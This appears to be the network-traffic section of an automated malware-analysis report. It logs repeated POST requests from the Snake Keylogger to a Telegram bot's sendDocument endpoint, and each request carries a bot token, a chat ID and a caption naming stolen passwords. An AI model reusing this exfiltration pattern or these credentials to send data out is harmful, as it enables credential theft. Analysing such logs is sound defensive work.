Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ecf01548Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed07eda7Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed249e37Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed3c6155Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed5b5f3dHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed7a5e75Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed995e14Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255edb5f876Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eddc1e0bHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255edf3f502Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ee0bccbdHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ee391976Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ee4ea61cHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ee6d8d55Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ee8c8b87Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eea46375Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eec0fef0Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eee725a5Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ef16d25fHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ef526da2Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ef716bedHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ef89435dHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ef9eb898Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255efc4de56Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255efdcb580Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255effbb41aHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f018515dHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f03027e0Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f06e24edHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f08ac29cHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f0a9c21aHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f0cfe7e3Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f0f60d43Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f11c3109Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f1425682Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f1615788Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f180548bHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f195cb65Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f1c577ffHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f1e21602Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f20113e6Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f218e9b8Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f23f1164Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f25e1060Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f27aaaf6Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f2b1806bHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f2e5f3feHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f31ccb95Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f33968c1Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3513e44Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3703e3cHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f385b3d9Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3a4b001Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3c3aea9Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3db8728Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f3f8239eHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f41721baHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f42efb39Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f4446daeHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f4636ccfHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f47b43a1Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f490b922Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f4afb74cHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f4c78f72Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f4edb3a4Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f5032b33Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f51b008bHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f539ff42Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f54f76baHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f5674ca3Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f57f2362Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f59bc08bHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f5b39700Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f5d9be34Host: api.telegram.orgContent-Length: 407
